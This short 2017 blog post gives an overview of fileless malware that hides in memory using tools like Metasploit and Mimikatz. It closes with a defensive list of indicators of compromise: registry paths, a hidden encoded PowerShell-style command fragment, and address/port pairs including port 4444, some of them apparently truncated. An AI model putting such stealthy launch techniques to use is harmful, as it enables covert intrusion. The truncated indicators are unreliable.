August 9, 2017

Fileless Malware – Overview and IOCs

Jessa Gramenz

The first time I heard about the possibility of fileless attacks was in November of 2016. Less than a year ago, I was at the 2016 International Security Systems Association Conference in Dallas, Texas when Jarrett Kolthoff gave a presentation on Cyber Hunt Operations. Kolthoff had an extensive government background before joining forces with Speartip. During his presentation, Kolthoff mentioned a new threat living in our working memory, fileless malware. I recall thinking back to my days as a computer forensics student when we were always told not to shut off a device during forensic acquisitions due to the data living in memory. At a time when we keep devices and servers running at all times, it seems like a smart choice to place malware in RAM where it can escape detection by AV and other security tools. Instead of constructing a difficult APT, attackers use existing tools such as Metasploit and Mimikatz and keep them hidden in memory. These are methods that were just discovered by Kaspersky Labs last year.

What is fileless malware, and how does it work?

It seems the method itself is not new, but lately, it is being used more widely by criminals whereas before it was more commonly used by hacktivists. So now, we have monetarily motivated attackers with better skill sets utilizing a method that bypasses our common security measures. The attackers also bet on the proof of their evil-doing disappearing when a user shuts down their workstation, or in the event of a reboot for updates. Once the attacker is able to get the malware in memory, it is a matter of how long the APT can survive in memory and how much data they can obtain.

What can we do?

Although these methods are not new, they are designed to escape detection. Luckily, there are many resources available that list the indicators of compromise such as:

  • Window registry paths –
    • HKLM\SYSTEM\ControlSet001\services\
    • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp
  • In unallocated registry space –
    • exe -nop -w hidden -e
    • 10.1.12/8080
    • 10.1.11/4444

Endgame has also shared a great post about how enterprises can protect themselves from fileless malware.